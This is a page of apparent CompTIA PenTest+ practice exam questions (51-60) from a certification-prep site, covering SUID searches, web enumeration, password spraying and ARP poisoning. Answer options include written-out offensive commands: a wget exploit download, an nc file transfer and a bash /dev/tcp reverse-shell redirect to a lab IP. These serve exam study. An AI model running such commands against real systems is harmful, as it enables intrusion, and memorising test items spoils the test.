New Year Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-002 Questions and answers with CertsForce

Viewing page 6 out of 14 pages
Viewing questions 51-60 out of questions
Questions # 51:

A penetration tester runs the following command on a system:

find / -user root –perm -4000 –print 2>/dev/null

Which of the following is the tester trying to accomplish?

Options:

A.

Set the SGID on all files in the / directory


B.

Find the /root directory on the system


C.

Find files with the SUID bit set


D.

Find files that were created during exploitation and move them to /dev/null


Expert Solution
Questions # 52:

Given the following output:

User-agent:*

Disallow: /author/

Disallow: /xmlrpc.php

Disallow: /wp-admin

Disallow: /page/

During which of the following activities was this output MOST likely obtained?

Options:

A.

Website scraping


B.

Website cloning


C.

Domain enumeration


D.

URL enumeration


Expert Solution
Questions # 53:

Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Options:

A.

Executive summary of the penetration-testing methods used


B.

Bill of materials including supplies, subcontracts, and costs incurred during assessment


C.

Quantitative impact assessments given a successful software compromise


D.

Code context for instances of unsafe type-casting operations


Expert Solution
Questions # 54:

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

Options:

A.

Buffer overflows


B.

Cross-site scripting


C.

Race-condition attacks


D.

Zero-day attacks


E.

Injection flaws


F.

Ransomware attacks


Expert Solution
Questions # 55:

A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Question # 55

Which of the following represents what the penetration tester is attempting to accomplish?

Options:

A.

DNS cache poisoning


B.

MAC spoofing


C.

ARP poisoning


D.

Double-tagging attack


Expert Solution
Questions # 56:

A penetration tester ran the following command on a staging server:

python –m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

Options:

A.

nc 10.10.51.50 9891 < exploit


B.

powershell –exec bypass –f \\10.10.51.50\9891


C.

bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit


D.

wget 10.10.51.50:9891/exploit


Expert Solution
Questions # 57:

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?

Options:

A.

Create a custom password dictionary as preparation for password spray testing.


B.

Recommend using a password manage/vault instead of text files to store passwords securely.


C.

Recommend configuring password complexity rules in all the systems and applications.


D.

Document the unprotected file repository as a finding in the penetration-testing report.


Expert Solution
Questions # 58:

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?

Options:

A.

Hashcat


B.

Mimikatz


C.

Patator


D.

John the Ripper


Expert Solution
Questions # 59:

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

Options:

A.

Analyze the malware to see what it does.


B.

Collect the proper evidence and then remove the malware.


C.

Do a root-cause analysis to find out how the malware got in.


D.

Remove the malware immediately.


E.

Stop the assessment and inform the emergency contact.


Expert Solution
Questions # 60:

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

Options:

A.

<#


B.

<$


C.

##


D.

#$


E.

#!


Expert Solution
Viewing page 6 out of 14 pages
Viewing questions 51-60 out of questions